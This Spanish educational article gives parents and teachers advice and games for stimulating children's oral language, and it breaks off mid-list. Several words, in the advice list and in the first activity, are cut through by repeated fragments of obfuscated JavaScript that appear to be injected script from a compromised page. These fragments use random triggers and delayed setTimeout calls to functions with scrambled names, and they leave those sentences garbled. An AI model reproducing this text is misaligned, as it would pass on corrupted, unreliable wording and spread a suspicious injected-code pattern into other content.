LA ESTIMULACIÓN DEL LENGUAJE ORAL DESDE EL AULA DE PEDAGOGÍA TERAPÉUTICA

Autora: Mª Ángeles Cortés Bernabé

          En realidad todos somos un poco logopedas (padres y maestros) con los niños y niñas, ya que con nuesto modelo los enseñamos a hablar. Por eso, y para que la labor con estos sea más eficaz, os recomiendo estas pequeñas estrategias que se tienen en cuenta en el aula de pedagogía terapéutica (asesorada por el maestro del aula de audición y lenguaje), para favorecer la estimulacion del lenguaje oral. Además, si los padres las tienen en cuenta, complementarán el trabajo que se realiza en el colegio con sus hijos, en el caso de que precisen ayuda logopédica o asistan a algún programa de estimulación del lenguaje oral.


 Debemos tener en cuenta:

* Utilizar siempre un lenguaje claro y adulto, evitandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando diminutivos y el lenguaje infantilizado.


* Respetar el ritmo del niño cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando habla y no interrumpirle. No anticipar su respuesta aunque tarde.


* No reír las incorrecciones si el niño comete errores en su lenguaje. Se puede utilizar el método de corrección indirecta de las palabras del niño: repitiendo sus frases, corrigiendo las palabras mal dichas y añadiendo las que no dice, pero siempre después de que él haya acabado de hablar.


* Acostumbrar al niño a que escuche y él también debe ser escuchado.


Además algunas ACTIVIDADES Y JUEGOS que se pueden realizar con los niños son:


1º. Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el niño está jugandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con algún muñeco, podemos nombrarle cada parte del cuerpo del muñeco, señalarla y tocarla. Después haremos que sea él mismo quien lo haga, realizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando preguntas como: ¿Qué es esto?¿Dónde tiene la nariz tu muñeco?¿Y las orejas?… Aprovecharemos los momentos del baño para hacerle las mismas preguntas sobre si mismo.

2º.Enseñarle al niño objetos con diferentes colores y pedirle por ejemplo que nos de “la figurita roja”, “el muñeco azul”, etc…. Después solo se le pide el color.


3º. Aprovechar cualquier actividad del día a día para mantener una conversación con el niño: un día en el campo, el cuidado de las plantas, hacer un bizcocho, etc…. Nombraremos los diferentes objetos que se utilizan.


4º. Podemos utilizar el bolso de mano, la mochila, la bolsa de la compra, la bolsa de aseo, la caja de herramientas… para ver qué hay dentro. Hay que hacer que el niño busque dentro del bolso y vaya nombr